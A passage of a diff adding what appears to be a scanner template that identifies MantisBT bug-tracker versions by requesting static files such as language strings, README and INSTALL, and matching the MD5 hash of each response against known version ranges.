2.5.1 + dsl: + - "(\"3d9eb71449d72a52b8bf1a9a9c62697d\" == md5(body))" + - type: dsl + name: 2.0.0 + dsl: + - "(\"0ee067afcd4689edadc6c3403fcd0d70\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.11 + dsl: + - "(\"208f7471154868d2b2ae2071bcd2068c\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"e5a97f29f1b6ea4197f56e7791ec2212\" == md5(body))" + - type: dsl + name: 1.3.3 + dsl: + - "(\"b27bb465118cd075cd4ac6579ad8233a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.2 + dsl: + - "(\"dda21bf4a3368bbe482fecebb36da4ab\" == md5(body))" + - type: dsl + name: 1.3.12 - 1.3.20 + dsl: + - "(\"0e1bc9ddcdd1d80adbd6d5161107427d\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.12.2 + dsl: + - "(\"b61ee0b102be9db3f90b3f0dddab3867\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.15.1 + dsl: + - "(\"5fc41524b46a787eb3cda6ef3515e535\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"37ddaf623fcda1288965c36c9c022a3c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"5cc68747adffdbe3febf6a041f70f638\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.23.0 + dsl: + - "(\"55a2ddd08eb62afbc4a7dac12afd9e3d\" == md5(body))" + - type: dsl + name: 2.23.1 - 2.24.3 + dsl: + - "(\"e74ca062c5ddacbb5a965a72cae4b8b9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/README.md" + + matchers: + - type: dsl + name: 2.6.0 - 2.7.1 + dsl: + - "(\"40733c6a5fca3b2b751e4e5d43fad5a6\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.5.2 + dsl: + - "(\"7dc0c0dcbee6c6dadafb7430fd139819\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"b1c8b9d8921a93642e485bd9b265dac9\" == md5(body))" + - type: dsl + name: 2.0.1 + dsl: + - "(\"74b7612daedc72035c40078404132d97\" == md5(body))" + - type: dsl + name: 2.0.0 + dsl: + - "(\"29b5d9be5bdaeb2b0350dc521730ae0b\" == md5(body))" + - type: dsl + name: 1.3.6 - 1.3.16 + dsl: + - "(\"e55e2817ddac03fc31f66b07662fd833\" == md5(body))" + - type: dsl + name: 1.3.5 + dsl: + - "(\"f8f591a79fe2b064459e3c9f7c3953b8\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"a31bdd164b5b45de332d16af5c10848f\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.12.2 + dsl: + - "(\"59cb8f4f69fbd9b0e4209c66bf67124f\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.19.1 + dsl: + - "(\"45531d9be30477991a6ad13cd02e6367\" == md5(body))" + - type: dsl + name: 1.3.17 + dsl: + - "(\"3f46bc17778066b55c651050e9ddc1a5\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"f09030cfa802461de1df40f1c49f2600\" == md5(body))" + - type: dsl + name: 1.3.18 - 1.3.20 + dsl: + - "(\"4a3f4fa0ca508c03d6f3f16377cbefe2\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"1e265daa2d4ee7930c69d42b948ca88a\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"53cf30d00c9c61d5ba770a3cc1cb8c36\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"083791493c13b4da09f8fc115d39047b\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"59aba10e40281afca8308a8c1c19ef53\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.3.3 + dsl: + - "(\"a5f1ef7c24e147a30e2ecd9f2e7d65d0\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"487925e0626a0948c6874d4e7528b1ae\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"9815f297c0c25c121ed890b1dc60b84c\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"0d9f53aa0d8ccb1a0e5faa20b6683bee\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"88e10fa7775a140249c0902f55e90122\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"e1e9bd7bc91f9b21e66bbc7f2cd825a8\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"e1235a6797fa7086753f67b5477a6f86\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"047eefb265b9ceb20429f95d1beca707\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"8ca9cd1cd8d2f00821a836eb4b3958a5\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"95cfc257e61fb5eff12fd9fc3e4080af\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"a7c9f50e591ded48a8fa9998900daf72\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"0e7121e63266f40bb4d23179a3be8d19\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"700d1c69d4b1449ca1c7f4388c93a65f\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"90c7156cdd2019a190b674b115d83589\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.8.1 + dsl: + - "(\"32e481c7666f7d027bc69b4a678d4375\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"ae8eca3bc5665c7cc4f9c72b404eb084\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.4.2 + dsl: + - "(\"e84338a4a222e26a422ed56096ed6d84\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"332d4d5993cf571358934e586e5cb23e\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"20c1b742e09d5130266b2643078fd2c4\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"017bb522f85fb8652f9fd778c5483f10\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9503fadccab5ae48912616fa7a4f6cb1\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"503a07e1d3400d021fbf7a02591cbd6c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"4f72c9cf73f55ec3a9d40fdf3cd6a5fc\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"5813cc2f20ee2e4d4f63d42a79a6f1c6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a6aca7449d2436e75c5482dbcdf6620f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"32cc8f9eceb5cee585309b13ea9fe77b\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"5cfcaad9ecf12a99947a40a92f77566a\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"6cf898789b6f72540125d8b62542c265\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"ebdb37ac8f25fdf19a000dcd800d4ae5\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.19.1 + dsl: + - "(\"e24a56ca424184273583558481da1289\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"91995ff323b85a49b2e9e5df395b9314\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"814a34ecf91711b9a5c1c436077c2d7d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_norwegian_bokmal.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"a43b23a5d836233018c81ff77450aa41\" == md5(body))" + - type: dsl + name: 1.3.5 - 2.0.1 + dsl: + - "(\"f9f30b2ee55e5fe56acccddac6a23988\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"f249adbc1e4c11b514b37b6af6c66626\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9a6667381936e69e708dc94f4e83bf82\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"9c4324d4d4c82d00aaa3537806e93794\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"e305f72aba7a0a7e8f5a8d50733e2f5b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c3b697dece6abcd742a75e956a1da914\" == md5(body))" + - type: dsl + name: 1.2.15 - 1.2.16 + dsl: + - "(\"3bffcab2e42e2e261bd04193a1598a14\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"6cc540fd0d1a50676367331dea93ebe3\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"88e7d14c59e2820ff0589284af6c5c3b\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"cd51b74ab6d02bbaabe75f976d2b3b32\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"b3fe7901bb63ebcc28b0b23886f15291\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"e49fcb1a57b4790bff224a76e9f6014b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"3b409ba6b5ff3c3d51851f7a5392c127\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_ripoarisch.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.22.2 + dsl: + - "(\"44b38ddd9ed17a880e4aa4250d571878\" == md5(body))" + - type: dsl + name: 1.3.2 - 2.0.1 + dsl: + - "(\"793ba1b0776c764e38bf31a5f243fd4a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"4bf15e30376b2246c988a26002a37d88\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"cfafb013a8fa89b1469794795e2e99a1\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"66bb322d4ac9337299e97b6819322ef0\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"a45459be161030203da054f8b23847ab\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"5c9da80acd7114b74ba406bd592557f5\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"8f4ad1c717012483d6887846061882af\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"e622422236a7df456d0edae161e87f62\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"07d62d86e4dfd300bbf74714d64db427\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"3dfff5c3ce5269c140f02fb84b0ef2df\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"69c81f4bb97a54380e9c90840aea5a9e\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"50a92aa35a046d2f638ab0567199f344\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_croatian.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.10.1 + dsl: + - "(\"0c89459d7f8d175849aee179ee338347\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"062f29a2eef5d3f0061745862b9684dc\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8fb1504273b1c91df0487605e77392fa\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"cc196c5ecb5dbc6c52911cb1b6e57c0a\" == md5(body))" + - type: dsl + name: 1.2.1 - 1.2.4 + dsl: + - "(\"95b34672236b6cbe8de49cc52cd2f4f4\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e456a13e2e4b5f5fa2d25b7b085d9514\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"f1c4ae9657af235c4a950ab47337cd13\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"b5732a332f1aabb126cf06bd74a109eb\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"9115c33132dfcedda8015530268597de\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"16118ce1c54c2d71c97e9dcabd06dd60\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.9 + dsl: + - "(\"7bbb3789a285135d49062edc2a6e9635\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"40f41c60e4758e472d35a3b003917529\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"12d39949783fd43bf6dc23457ab20d29\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"6ac73a41372370c2a2726aff881d32e2\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"a94bfaa5d8c5f0ab4c89f9679972f733\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.19.1 + dsl: + - "(\"82171ef6ddbef4ffe7bf3dedd41ce62d\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.22.2 + dsl: + - "(\"99662d69f2577c670b84fb14b4f2f582\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"90f72d695a3bb61b1b15326996f18898\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"27486804b391f19520b3714dcf28893e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_portuguese_standard.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.9.1 + dsl: + - "(\"1429e34cc66323464b05382e2ef40c1b\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"3b6569f08e6cbf76145840027e2bea49\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"2d287698e658ba9aaec84e4d98254abb\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"ba884b47a5d732ede87093ba0674bd4a\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"6ae933337821771ef20c72e492fc40e7\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"3fe02a6e3264873872aed4a1a328ada8\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"78ecd829c5628c3aedcf7ed86e1f8b88\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"cf9d937fd160e1cbdaa5e0d68fb0bc69\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"8afd7b789fd93df7cf26a39c19972ba9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b8e283bca972fe788f3d3f4eaeb19e72\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.21.3 + dsl: + - "(\"a6a6cbba99dfb07a4a4c1ab51e6956d9\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.24.3 + dsl: + - "(\"c62025a44db68174fe85e0c044b7d835\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_spanish.txt" + + matchers: + - type: dsl + name: 1.3.5 - 2.9.1 + dsl: + - "(\"fb7b220ea907065983208b6720f78033\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"89b703190e5c169d9c0de44badd15c22\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"7d2f01db6af04e5906a6dad0fef736e4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9ceb47b77d428c7aa2cf19e3d3be70f6\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"92214f5721f51134c1becedf29204ac3\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"d2ba35b897f3cf879a4998902c73f58f\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1c60a09f59fbbc7b10cc1d2bedf03190\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"c27d91075396ab960fbbe5cdfd0bf43f\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"30f1e62c016b9cf21eaa400cc87a5b48\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"abaa04e3e74b54e3336e7cb025bbd87f\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"99c4549cad7940f0a9489eef9ed64621\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.24.3 + dsl: + - "(\"04be43c6b8459f3b1f944ad0330e75d8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/configuration.sgml" + + matchers: + - type: dsl + name: 1.2.20 + dsl: + - "(\"9609c929da0242becf0655ce329ae2dc\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.19 + dsl: + - "(\"b71606fc60091f76434494a68a7e87f9\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.17 + dsl: + - "(\"5dd2b5cd2bcc936dea54edb24a10cb14\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"5bd72a28721379d89476f38392ba66ac\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"15b91f0a2486a71074a5465d29c79c4e\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"ba4791786556f689974b3fd38ee77393\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/installation.sgml" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"472ebb31a0ce9f0f42cdbfd0e5e1616a\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"bdd3a14790070f83b72fd5934dbbd4ea\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"b651993253641e77a7d4ece62d9e2ab7\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"8ef451851c5ae15895f6a74a8adada42\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"8d28d867b9e1a706adac517178c9c58b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/INSTALL" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"161de47e93a2f9ce7f3d76950837e6bf\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"24d00e95780e23407f643fb8e2900d5b\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"afed810c01fb3433ee3f653a79f3084c\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"bda5bcd2d701306435293b5059768be7\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"ac8607b8eb510cf5f6378ec0db2d5335\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.2 + dsl: + - "(\"329e19fb73554599e44215513a8a644a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"fe68ab9f0d1856686ca4e87adc13a4cd\" == md5(body))" + - type: dsl + name: 1.1.1 - 1.1.9 + dsl: + - "(\"7ad732cf4cf2c54d445b0d5bdba94089\" == md5(body))" + - type: dsl + name: 1.1.0 + dsl: + - "(\"af0287d07100cffe37514b047d2a11e8\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"8ad7233951e59c8a3bd9c2c25db49084\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"ec42e1170405f9abbf440c719430ef98\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_german.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"2a85c13974e47d7fc1f367b8f5cf8d04\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.11 + dsl: + - "(\"ef41ee6944f3ae5e9ace0ff9011440f3\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"568cec42e8cd6a5f9253f424ce68ee33\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"044ffa50ffd946d67a06495900314593\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"24297ee7df5d612ac09d69c26b48096b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a3eaaf0e6a4845ac255a93f2b3b903f3\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"d33e5be8169c2f68d80d2f41eda28d5c\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"c51c0a8afa58312014f81d64a84c856b\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"4aeac09b2449c78266840998d98d39c3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.4.0 - 2.24.3 + dsl: + - "(\"886b094928f9b485a567d1b7c5ec938c\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.3.3 + dsl: + - "(\"cc9ea370d9d67791034113ff24c4d428\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"cb9209a278fcc19d8c8b06ac067591b3\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"8261615939c38e72f9ff37ad2781cfbb\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"9ede31687e6428fa7fdb4e271e52ad5c\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"7f6e40abebc5a5e946bd0164302d45ba\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"457ebd85387603adcf9776a253d2a9b9\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"70be9ca2d1dba874a801e95e88dfcd92\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"633d011a14a05f591365564cae6c8556\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_interlingua.txt" + + matchers: + - type: dsl + name: 1.3.5 - 2.24.3 + dsl: + - "(\"a4a1c3e375134fa75f8e1d748bc82e48\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"178ac8b7659b018ca753fe778270d06e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"ec76fe729957f6ec65934755cc0e4670\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"55a7edadc33240bc3680c89b3876cc84\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"31413933e27aaf985ccdbec87518386d\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"0be58462cbfd25f17f5eb320aa45c91e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1f203d95961be920a1d35422afe1c8f9\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"871081460dacb92cf6aa8bb599c0cd9f\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"8e72cd39a65880df82ae876b1fc30741\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.24.3 + dsl: + - "(\"d4b95f7206340859c05eadb4b09db8fc\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"167ca84cd407d368fcc362de6bc93723\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"8e645123dfa21dfa753f1f2b8acfd227\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"ca5c941aec5f32ab475e09ab7f769dc9\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"f95a98fc678410084ca17ba1e2e38d88\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"549da4508ecfeeced4b994fb232cc9a7\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"a1313dd898983a8c7ff0a0c2e2b9abce\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"75a6b443eb041f56a7134962ed19da72\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"6036b5965740723e21134db383bad1a9\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"db006465822e32349297bc1a2abf6cf2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.24.3 + dsl: + - "(\"c3adce0ee425db4a065ca55d7b79311b\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.4.2 + dsl: + - "(\"7aae97f0d785c789a2e34beec99d28bb\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"d72e1b705e98a3a744ed71486c2b5d7a\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"ce9475094b6f2958f054d5f8797be064\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"57d30442a9eedc832803d59365c70872\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"2940d9247adde80df5edea6f5ecf7dc4\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"47f43dedffeb86b9aa68c7d2f7f9d6fd\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"5c5ed2254680c5e75244b55acabd09f5\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"a767e57348715535cbcea4249e57f829\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_ripoarisch.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.24.3 + dsl: + - "(\"4a6c990b9591d89c7bfd3375789846c8\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"7e72bc84a97b04fe223c0b37d7770826\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"0a5a6ebf2684b555fc9289d74016ceff\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"49bdcda37cc0b88abe198ca79d266d96\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"b391de0d8facd52464e1a2bffd2f4d5b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"d05007ea8bd29057c83fbeabb9b0180e\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"4e57fe3ff196c71e4fdc21c250582e22\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"2030a0dc3a0adbd92d255aea79c7a14b\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"98842ffbd581b46758c433a7552bfb9e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_spanish.txt" + + matchers: + - type: dsl + name: 2.6.0 - 2.24.3 + dsl: + - "(\"b8bf8986a10291922594cfb4a9e70c5d\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"7f70cd0715fec09d7dfdf16e76a2806e\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"897a88f3cf777385d4c52abef06aa842\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"71bc3f732c80e9caed15d6102496d101\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"8bb8f4918993f34e6c0baaf35a6b978b\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"d07bacd8f26a71db4dafae86a4d15c5b\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"fd992238c1783ea27d972718d2a74c5a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.15 + dsl: + - "(\"6704c19c8ee28995b843953f331ea5dc\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"1c45013a11d56b0df5ee727a27e428e2\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"177014221c096d132a413d17a0a8cb28\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"a09364f40c293dc93939bc14c696265e\" == md5(body))" + + 